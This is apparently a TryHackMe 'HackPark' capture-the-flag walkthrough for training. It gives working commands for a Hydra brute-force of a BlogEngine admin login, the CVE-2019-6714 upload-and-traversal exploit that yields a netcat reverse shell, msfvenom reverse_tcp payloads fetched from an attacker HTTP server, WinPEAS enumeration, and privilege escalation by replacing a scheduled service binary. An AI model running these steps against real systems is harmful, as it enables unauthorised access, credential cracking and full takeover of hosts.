TryHackMe-HackPark

This room involves Hacking Windows with Hydra, RCE & WinPEAS. Start out with an Nmap scan on the target.

Name of the clown displayed — pennywise

Use Dirb/Gobuster to find hidden directories and we find a admin panel at /admin in the webserver.We use hydra to bruteforce it.

hydra command to bruteforce admin panel

Explaination: We use the username “admin” and use the option http-post-form as the website login page is using a POST request. Now we will have to enter 3 options according to the following format-

“The directory of the webpage : the request which we find using burp : the error message we get after failed login attempt”

1. The directory of the webpage is /Account/Login.aspx

2. Try intercepting the request using Burpsuite while logging in and you will get this. Copy from the __VIEWSTATE part and paste it in your hydra command

3. The Error message is “Login Failed”

NOTE: the only little change we have to do is to set UserName=^USER^ and Password=^PASS^

This is what the final hydra command will look like.Run it and you will get the password

hydra -l admin -P /usr/share/wordlists/rockyou.txt $rhost http-post-form "/Account/login.aspx:__VIEWSTATE=J7%2FrKT%2FRbzXElHvOFArr4HX0BUp05PUs%2Bjl4fN5QtFnsigr6tjwFZkWaUW9RaCNkl5wcaaA9I71WXBKsdywllsO45a8kdE%2BO2GeciLswYLZgMhEIYMOLKvVE1g9%2FuxmOjygsPrfW43YX1axgD3V%2FmbHd2lx7jcwje7Qgkp065G2LekTQ&__EVENTVALIDATION=nIJxL4rdGJE3KYMzFDmVH35CAPYLfmVh68KpFWCfpmOAp8i4dLgnYkYLVP3UEDV8IiIqX6kXoIwujnQvd7xTK1Tbiqg5RF0fYL3q6nazJk37P%2BrLs8lq043TvaeMwGi4uqTkx2onf8prQt9NNxgtS4oXE0haNUx6xQId8O8kqlZfYRAG&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

Once you have logged in,Go to the ABOUT part and you will get the version of the Blog Server which is running(searchsploit blogengine 3.3.6).The exploit can easily be found in exploit db : CVE-2019–6714

Download the exploit and carefully read the instructions.It has been explained very simply.

First, we set the TcpClient address and port within the method below to our attack host, who has a reverse tcp listener. 
Next, we upload this file ... as PostView.ascx. The admin page that allows upload is: http://10.10.10.10/admin/app/editor/editpost.cshtml
Finally, the vulnerability is triggered by accessing ... http://10.10.10.10/?theme=../../App_Data/files

All you have to do is change the ip in the exploit code and save it as PostView.ascx then go to “POSTS”, edit the default post and there is a small folder icon.Go there and Upload your PostView.ascx

Now start your netcat listener at port 4445 and do not exit or leave the browser tab.We have to edit the URL of the of the current webpage to

targetIP/?theme=../../App_Data/files

as soon as you hit enter and load this,you will get a reverse connection on netcat.

we have a shell

We now have a low level shell which we must try to upgrade to a meterpreter shell.To do so, we will have to make a payload using msfvenom and run it on the target windows machine and catch the connection using /multi/handler of metasploit.

First we create our payload.

NOTE: I have used shell_reverse_tcp here so just replace it with meterpreter/reverse_tcp and you are good to go.

Now we run a http python server in our local machine using the command: python3 -m http.server

We use Invoke-WebRequest to transfer the file to our target machine(You might notice below that we are moving the file to C:\Windows\Temp this is because the Temp folder is often world writable.If we try moving our file to some other folder in the target machine, we might get an error due to lack of permission)

Before we execute the payload(WINPAYLOAD.exe) in our target, first lets make a handler in metasploit to catch the connection.Just replace the payload to /meterpreter/reverse_tcp instead of shell_reverse_tcp

Once you execute WINPAYLOAD.exe in the target machine(in our previous netcat shell) using the command- .\WINPAYLOAD.exe you will surely get a meterperter shell here.

Getting a meterpreter shell makes work easier for us.You can run helpful command like sysinfo , ps and get some idea about the target machine

Now we can run winPEAS.exe in our meterpreter shell to further enumerate the target and find any possible vectors to privilege escalate.Make sure you download winPEAS from github and now We can simply upload and run winPEAS in our target using the commands:

upload winPEAS.exe
shell
winPEAS.exe 

You will see a lot of data once has been executed and it will take quite some time.One juicy information we get is this service called WindowsScheduler

What is the name of the abnormal service running?-WindowsScheduler

What is the name of the binary you’re supposed to exploit?

A binary is given in the winPEAS output: WService.exe. Just to confirm it, we can search for the application in exploit-db

searchsploit splinterware
searchsploit -x 45072

Alternatively, this binary can also be found by searching in the list of running processes and grepping for the WindowsScheduler service:

tasklist /svc | findstr /i windowsscheduler

However, this is for some reason not the correct answer. To find the correct binary name, we need head to the service dir, which has an Events dir that contains a log file. Checking the log file reveals a binary that is run once in a while,Message.exe

you can also try running- tasklist /v to see all running processesand you will see one called Message.exe

cd C:\Program Files (x86)\SystemScheduler\Events
type 20198415519.INI_LOG.txt

The name of the binary is- Message.exe

The WindowsScheduler service runs periodically, calling Message.exe with root privilege. So we can obtain root by replacing Message.exe with an executable of our choice to spawn a reverse shell.

We now generate our own Message.exe executable with msfvenom, making sure a different lport is used.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -f exe -o Message.exe

Now start another metasploit instance and start a listener like before. In the previous meterpreter, upload our Message.exe into the correct dir on the target machine.

cd "C:\Program Files (x86)\SystemScheduler"
upload Message.exe

Now wait a few minutes for WindowsScheduler to run, and we’ll get another meterpreter with root.Run whoami command to check fyou are root or not.

Location of ROOT AND USER FLAGS

cat C:\Users\jeff\Desktop\user.txt
cat C:\Users\Administrator\Desktop\root.txt

SOLVING WITHOUT METASPLOIT

If you are able to solve with metasploit and have understood the concept, then solving it without metasploit is not much different.

Basically, to get an initial netcat shell we use windows/shell_reverse_tcp instead of windows/meterpreter/reverse_tcp.Now to transfer our payload and winPEAS file we use Invoke-WebRequest instead of upload command which we had in metasploit.

powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/WinPEAS.bat' -OutFile 'c:\windows\temp\winpeas.exe'"

Other than that the rest of the process is same.

BONUS:

If you tried to connect to port 3389 which is a RDP port, you can actually see the root.txt flag on the desktop and you also get a popup of Message.exe service which runs every 30 secs.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

This was a intermediate level machine and i hope you learned something by solving it.- ZEUS